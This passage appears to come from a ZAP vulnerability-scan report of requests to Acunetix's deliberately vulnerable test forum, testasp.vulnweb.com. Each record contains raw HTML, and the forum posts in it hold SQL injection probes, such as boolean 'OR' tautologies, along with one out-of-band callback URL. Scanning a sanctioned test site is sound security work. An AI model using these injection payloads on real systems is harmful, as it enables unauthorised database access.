Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4151 |
Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:38 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2>(0+5+447-447) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=76 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4165 |
Response Body - size: 4,165 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 2+813-813-1=0+0+0+1 or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=77 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4165 |
Response Body - size: 4,165 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3+813-813-1=0+0+0+1 or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=78 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4163 |
Response Body - size: 4,163 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:01 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2<(0+5+813-813) or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=79 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4163 |
Response Body - size: 4,163 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:01 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2>(0+5+813-813) or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4140 |
Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>http://xfs.bxss.me</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=80 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:02 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 2+332-332-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=81 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=81 HTTP/1.1
